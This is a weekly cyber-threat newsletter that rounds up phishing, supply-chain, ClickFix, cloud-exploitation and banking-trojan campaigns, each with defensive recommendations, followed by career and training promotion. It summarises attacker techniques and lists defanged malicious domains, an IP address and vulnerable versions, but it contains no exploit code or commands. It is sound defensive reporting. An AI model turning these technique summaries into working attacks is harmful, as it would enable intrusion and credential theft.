Triaging the Week 118
AiTM & Identity Hijacking Wave // Supply Chain Compromise Continue // Cloud, Web & Infrastructure Exploitation // Banking Trojans & State-Sponsored Smokescreens
Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week's top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top News Stories
Theme 1: The AiTM & Identity Hijacking Wave
Stories
🗞️ Vishing & SSO Abuse Speedrunning Data Extortion in SaaS Ecosystems – Cordial Spider and Snarky Spider are pulling off “malware-less” intrusions — legitimate auth flows + residential proxies + hidden inbox auto-delete rules to silence security alerts. Sub-1-hour data theft, no binary ever lands.
🗞️ How “AccountDumpling” Bypasses Filters to Steal 30k Accounts — noreply@appsheet.com (a Google-owned, SPF/DKIM/DMARC-clean address) is being used as a phishing relay. The lure passes every reputation check and lands in the primary inbox. 🔎 Threat Hunting Package
🗞️ Sophisticated AiTM Phishing Targeting Corporate Compliance — “Code of Conduct” review lures + preemptive authenticity statements + CAPTCHA gates that block scanners while building user trust. 35,000+ users across 13,000+ orgs hit; healthcare, finance, and tech leading the impact.
🗞️ Hackers Weaponize Google Ads to Hijack GoDaddy ManageWP Portals — Sponsored search ads with deceptive Display URLs lead to AiTM proxies that steal credentials and session tokens, neutralizing basic MFA. Web agencies running ManageWP are the high-value pivot point. One breach, dozens of client sites.
🗞️ Threat Actors Weaponize Amazon SES for Phishing & BEC — Legitimate domains routed through AWS’s high-reputation servers, valid SPF/DKIM signatures, clean infrastructure reputation. SPF/DKIM is no longer a meaningful signal of intent.
Recommendations
☑️ Phish-resistant MFA is the floor, not the ceiling. FIDO2 / WebAuthn hardware keys for all privileged accounts. They bind auth to the specific origin and break AiTM token theft entirely.
☑️ Audit IdP logs for unauthorized device registrations and inbox auto-delete / forwarding rules. These are the tactics used to silence “malware-less” intrusions.
☑️ Out-of-band verification for any email-driven financial or admin request — phone or internal chat, independent of email.
☑️ Shorten session token lifetimes and bind tokens to devices via Conditional Access. Limits the window in which a stolen cookie is useful.
☑️ Move email gateways to behavioral / NLP analysis rather than reputation-based filtering. Trust the patterns, not the signing keys.
☑️ Bookmarks, not search, for sensitive admin portals, and consider org-wide ad-blocking / DNS filtering to strip sponsored results.
☑️ Update internal templates and training: “security-approved” banners, CAPTCHAs, and Code-of-Conduct emails are now attacker tactics. Compliance flows should originate only from known internal portals.
Theme 2: Supply Chain Compromise — When Trusted Code Turns Hostile
Stories
🗞️ Malicious “BufferZoneCorp” Packages Infiltrate CI/CD Pipelines — Beyond simple secret theft, fake Go wrappers and manipulated GOPROXY settings intercept future tool executions and bypass checksums. Persistence inside the build environment itself. 🔎 Threat Hunting Package
🗞️ Trellix Discloses Source Code Repository Breach — A single phished researcher gave attackers source code repo access. Even XDR vendors have human-shaped front doors.
🗞️ ScarCruft Compromises Gaming Platform in Targeted Espionage — ScarCruft owned the update mechanism of a Korean gaming platform, letting them deliver bespoke payloads only to specific victims while the general user base saw clean updates. Selective targeting at the supply chain level. 🔎 Threat Hunting Package
🗞️ Supply Chain Attack Compromises Official DAEMON Tools Software —Trojanised installers signed with the legitimate AVB Disc Soft developer cert. Valid signatures bypass perimeter trust filters; the QUIC RAT then specifically targets gov, scientific, and manufacturing orgs. 🔎 Threat Hunting Package
Recommendations
☑️ Treat third-party packages as untrusted by default. Run SCA tools that flag suspicious init() / extconf.rb / postinstall behavior before merge.
☑️ Phishing-resistant MFA on all source code repos and developer accounts — Trellix’s breach started with a phished researcher.
☑️ Automated secret scanning in CI/CD + rotation of any AWS keys, SSH keys, GitHub tokens, certs, or API keys exposed via build environments.
☑️ Verify signed binaries by behavior, not just signature. Code-signing monitoring + EDR rules for anomalous parent-child process chains and DLL sideloading from signed binaries.
☑️ Application allow-listing (WDAC / AppLocker) restricts which signed binaries can actually run sensitive operations.
☑️ Hunt for BufferZoneCorp / knot- prefix packages in your dependency trees, and audit endpoints running DAEMON Tools 12.5.0.2421–12.5.0.2434 (isolate, hunt traffic to env-check.daemontools[.]cc).
Theme 3: ClickFix & User-Driven Execution
Stories
🗞️ Venomous Helper: Dual-RMM Modern Phishing Attack — Fake browser-update lures push the victim to paste a malicious PowerShell command into their own terminal — the user becomes the installer, bypassing every browser sandbox and web filter. 🔎 Threat Hunting Package
🗞️ ClickFix Campaign Hijacks WordPress to Target Australian Infrastructure — ASD ACSC alert. Compromised Australian WordPress sites serve a fake Cloudflare verification page. Victim copies and pastes a “verification” command into Run / PowerShell and installs Vidar Stealer themselves. 🔎 Threat Hunting Package
🗞️ Fake Claude Site Spreads New Beagle Backdoor —Malvertising drives users to claude-pro[.]com, which abuses a signed G DATA antivirus updater for DLL sideloading. PlugX-style technique repackaged as a “snackable” backdoor riding the AI hype wave. 🔎 Threat Hunting Package
🗞️ Telegram “Mini Apps” Hijacked for Multi-Stage Crypto Scams — FEMITBOT impersonates NVIDIA, Apple, Disney, and BBC inside Telegram’s WebView. The “app-like” feel within a trusted platform lulls the user. No browser warnings, no sideload friction until the APK push.
Recommendations
☑️ PowerShell hardening — Constrained Language Mode + Script Block Logging (Event ID 4104) + AppLocker / WDAC on script execution from sensitive directories. Removes the runway these lures depend on.
☑️ Block traffic to the named IOCs — claude-pro[.]com, 8.217.190.58, plus any “verification” / “update” domains your TI feeds surface.
☑️ Targeted user training on the “copy-paste” mechanic. Hammer the message: legitimate browser updates, Cloudflare checks, and codec installs never require running a command. If a webpage tells you to open Run or PowerShell, it’s an attack.
☑️ Software-acquisition rule of three: verified vendor domain only, ignore “sponsored” labels, check for legitimate corporate links (Privacy / About) before downloading.
☑️ No sideloaded APKs from chat platforms. Treat Telegram bot prompts to “unlock earnings” or “complete referral tasks” as advance-fee scams by default.
☑️ Brand-protection monitoring to take down fraudulent Telegram bots and Mini Apps using your branding before they reach customers.
Theme 4: Cloud, Web & Infrastructure Exploitation
Stories
🗞️ Southeast Asian Threat Actors Weaponize cPanel Management Panels — Hijacked cPanel servers aren’t just data sources, they’re being repurposed as stealthy nodes for global phishing and C2. “Infrastructure persistence” via root-directory backdoors that survive site-level scans. 🔎 Threat Hunting Package
🗞️ New “Cloudz” Pheno Infostealer Exploits Cloud Infrastructure — “Living off the cloud” — C2 hosted on the same legitimate cloud services orgs use daily. Egress traffic appears to be normal business activity. 🔎 Threat Hunting Package
🗞️ Turf Wars in the Cloud: Worm Evicts Competitors to Monopolize Credentials — A cloud-native worm that purges rival malware (TeamPCP) before harvesting .env credentials. Automated competitive analysis, attacker-vs-attacker turf wars at scale.🔎 Threat Hunting Package
🗞️ Palo Alto Networks Firewalls Under Active Zero-Day Exploitation — Two zero-days chained (missing auth check + command injection) take an unauthenticated internet user to root admin on the firewall in a single session. Management plane exposed to the public internet is the precondition.
🗞️ Critical Sandbox Escape: CVE-2023-29017 Threatens Node.js Environments — vm2’s Error-object handling and async-function quirks let attackers escape the sandbox to the host. The recurring CTI lesson: “perfect” software isolation gets defeated by language runtime quirks.
Recommendations
☑️ Get management planes off the public internet. cPanel (2083 / 2087), firewall mgmt interfaces, Docker socket all behind a jump box, ZTNA, or VPN with strict ACLs.
☑️ Patch on a timer for actively-exploited CVEs: PAN-OS to 11.2.4-h1 / 11.1.5-h1 / 10.2.12-h2; vm2 to 3.9.15+; run npm audit for transitive vm2 dependencies.
☑️ Stop storing long-lived secrets in .env files. Move to secret managers (AWS Secrets Manager, Vault) with short-lived IAM-role-based auth.
☑️ Phishing-resistant MFA on every management panel + IP-based ACLs restricting admin access to known networks.
☑️ Runtime cloud detection — flag unauthorized process kills, unusual scanning from inside containers, and anomalous egress to unfamiliar buckets/regions. The “malware-on-malware” signal is genuinely useful.
☑️ For high-risk untrusted code execution, move to hardware-level isolation (gVisor, micro-VMs, Firecracker) instead of relying solely on language-level sandboxes.
☑️ File integrity monitoring on web hosts to catch root-directory backdoors and cron-job tampering. The cPanel persistence pattern.
Theme 5: Targeted Operations — Banking Trojans & State-Sponsored Smokescreens
Stories
🗞️ TclBanker: The Evolution of Brazil’s Most Persistent Banking Worm — Operator-driven banking trojan with a full-screen Windows overlay that locks the victim out while the operator manually steals MFA tokens in real time. Self-propagates via WhatsApp Web and Outlook, turning each victim into the next launchpad.🔎 Threat Hunting Package
🗞️ Iranian MuddyWater Exploits Chaos Ransomware as a Destructive Decoy — A nation-state actor hiding behind commodity Chaos ransomware “muddying tracks” so destructive activity looks like an opportunistic cybercrime hit. State-sponsored ops are increasingly mimicking criminal noise for plausible deniability. 🔎 Threat Hunting Package
Recommendations
☑️ EDR rules for unhooking and “double DLL loading” — TclBanker’s evasion path, but generally useful against Windows ETW / AMSI tampering.
☑️ Out-of-band verification for high-value transactions. If a banking session “locks” with a system-style overlay, disconnect and report, and don’t approve.
☑️ Strict RMM allow-listing. ScreenConnect, AnyDesk, and similar should be approved-list-only; any unapproved installation is a P1 alert. MuddyWater’s primary access vector.
☑️ PowerShell execution policy enforcement + EDR monitoring for encoded scripts, obfuscation, and outbound traffic to cloud file-sharing (common to both operations).
☑️ Risk-based vulnerability management on internet-facing applications and VPNs (MuddyWater’s go-to entry point).
☑️ Treat unexpected ZIPs / MSIs over WhatsApp Web and Outlook with suspicion, even from known contacts; these are TclBanker’s self-propagation channels.
Feature Video
You’ve spent £400 on a cert. Three months studying for it. Then the hiring manager has never heard of it. 😬
This happens way too often to people trying to break into Cyber Threat Intelligence. The fix isn’t more effort; it’s a better order.
Here’s the 4-cert progression I recommend for landing your first CTI role in 2026 (without burning your savings):
🛡️ CompTIA Security+ — your HR filter pass. CTI sits atop operational security, so the fundamentals (networking, threat vectors, IR) aren’t optional. Get it and move on.
🎯 BTL1 — A 24-hour practical lab where you investigate a live incident, plus a dedicated CTI domain covering strategic, operational, and tactical intelligence. The closest thing to real CTI work you’ll do before being hired.
🧠 CompTIA CySA+ — rounds out the analytical framework underneath the practical work. Sits cleanly on the recognized intelligence analyst career track and proves you can think like a threat analyst.
🔍 EC-Council CTIA — structured around the intelligence lifecycle (planning → collection → analysis → dissemination). Walk into an interview talking that language, and you sound like someone already doing the job.
The biggest mistake I see? Going straight for the GCTI. It’s the industry gold standard, but chasing it before the foundation is like skipping GCSEs (or your SATs if you’re in the U.S.) to apply for a PhD.
Build the base, get some SOC time, then invest!
Feature Course
What Will You Learn?
The basics of cyber threat intelligence (CTI)
Key concepts used within the cyber threat intelligence industry.
How CTI is applied in the real-world
Common challenges and how to overcome them.
Learning Resources
Cyber Training
Zero-Point Security: Advanced training in red team operations, adversary simulation, and offensive development.
TCM Academy: A comprehensive suite of courses with a hands-on, practical approach to training that equips students with the real-world skills needed to succeed in cyber.
Blue Cape Security: A specialist in Digital Forensics and Incident Response (DFIR) training, offering courses to take you from complete beginner to expert.
Tools
Octoparse: A no-code solution that will save you time, energy, and money. Let me show you how to use it to build your own custom cyber threat intelligence web-scraping tool!